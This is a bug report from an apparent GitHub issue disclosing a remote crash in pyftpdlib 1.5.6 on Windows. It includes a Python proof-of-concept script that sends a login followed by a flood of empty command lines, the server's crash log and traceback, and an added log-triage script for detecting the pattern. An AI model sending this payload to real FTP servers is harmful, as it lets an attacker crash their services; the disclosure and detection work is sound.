
pyftpdlib 1.5.6 remote crash bug on Windows

Open dazhouzhou opened this issue 2 years ago • 1 comments

I used LaiFu to fuzz pyftpdlib on Windows 10 and I found a remote crash bug. Details are as follows:

  • run pyftpdlib
python -m pyftpdlib -u fuzzer -P passwd --debug
  • run poc.py
import socket

host = "127.0.0.1"
port = 2121

# pkt1 is "USER fuzzer\r\n"; pkt2 is "PASS \r\n" followed by a run of bare "\r\n" lines.
pkt1 = bytes.fromhex("555345522066757a7a65720d0a")
pkt2 = bytes.fromhex("50415353200d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a")

if __name__ == "__main__":
    # python -m pyftpdlib -u fuzzer -P passwd --debug
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.recv(1024)
    sock.send(pkt1)
    sock.recv(10000)
    sock.send(pkt2)
    sock.recv(10000)
    sock.close()
  • crash log
[I 2022-04-12 09:48:49] concurrency model: async
[I 2022-04-12 09:48:49] masquerade (NAT) address: None
[I 2022-04-12 09:48:49] passive ports: None
[D 2022-04-12 09:48:49] poller: 'pyftpdlib.ioloop.Select'
[D 2022-04-12 09:48:49] authorizer: 'pyftpdlib.authorizers.DummyAuthorizer'
[D 2022-04-12 09:48:49] handler: 'pyftpdlib.handlers.type'
[D 2022-04-12 09:48:49] max connections: 512
[D 2022-04-12 09:48:49] max connections per ip: unlimited
[D 2022-04-12 09:48:49] timeout: 300
[D 2022-04-12 09:48:49] banner: 'pyftpdlib 1.5.6 ready.'
[D 2022-04-12 09:48:49] max login attempts: 3
[I 2022-04-12 09:48:49] >>> starting FTP server on 0.0.0.0:2121, pid=11208 <<<
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session opened (connect)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 220 pyftpdlib 1.5.6 ready.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <- USER fuzzer
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 331 Username ok, send password.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[fuzzer] <- PASS ******
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: send(), err: [WinError 10053] 你的主机中的软件中止了一个已建立的连接。 (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: unregister(); fd was no longer in socket_map (<pyftpdlib.ioloop.Select (fds=1, tasks=2) at 0x27d52002110>)
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session closed (disconnect).
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:55] [debug] closing IOLoop (<pyftpdlib.ioloop.Select (fds=2, tasks=1) at 0x27d52002110>)
[D 2022-04-12 09:48:55] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
Traceback (most recent call last):
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 122, in <module>
    main()
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 116, in main
    ftpd.serve_forever(timeout=2 if os.name == 'nt' else None)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\servers.py", line 245, in serve_forever
    self.ioloop.loop(timeout, blocking)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 343, in loop
    poll(timeout)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 446, in poll
    r, w, e = select.select(self._r, self._w, [], timeout)
OSError: [WinError 10038] 在一个非套接字上尝试了一个操作。

dazhouzhou, Apr 12 '22 02:04
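Added example, not part of the original issue or of pyftpdlib: a triage pass over pyftpdlib `--debug` output that flags the two patterns visible in the crash log above before the traceback, namely a run of empty command lines from one peer and command traffic still logged for that peer after its "FTP session closed" line. The names `PEER_LINE` and `triage`, the `max_empty` threshold and the last sample line are assumptions made for this example.

```python
import re
from collections import defaultdict

# Per-connection lines in the log above: [<level> <date> <time>] <ip>:<port>-[<user>] <text>
# Assumes IPv4 peers; "[debug] call: ..." lines and tracebacks do not match.
PEER_LINE = re.compile(
    r"^\[[A-Z] \d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\] "
    r"(?P<peer>\d+\.\d+\.\d+\.\d+:\d+)-\[[^\]]*\] (?P<text>.*)$"
)

# Subset of lines copied from the crash log above, in their original order.
# The last line is constructed here to stand in for an unrelated client.
SAMPLE = '''\
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session opened (connect)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session closed (disconnect).
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:52] 127.0.0.1:50000-[] <- USER fuzzer
'''


def triage(log_text, max_empty=3):
    """Flag peers with more than max_empty empty command lines, or with any
    command/reply traffic logged after their "FTP session closed" line."""
    counts = defaultdict(lambda: {"empty_cmds": 0, "after_close": 0})
    closed = set()
    for raw in log_text.splitlines():
        m = PEER_LINE.match(raw.strip())
        if m is None:
            continue  # not a per-connection line
        peer, text = m["peer"], m["text"].strip()
        if text.startswith("FTP session closed"):
            closed.add(peer)
        elif text.startswith(("<-", "->")):
            counts[peer]["empty_cmds"] += text == "<-"   # command line with no verb
            counts[peer]["after_close"] += peer in closed  # handler active after close
    return {p: c for p, c in counts.items()
            if c["empty_cmds"] > max_empty or c["after_close"] > 0}


if __name__ == "__main__":
    for peer, counters in triage(SAMPLE).items():
        print(peer, counters)
```

The peer key is `ip:port`, so a later session that reuses the same source port is counted together with the earlier one.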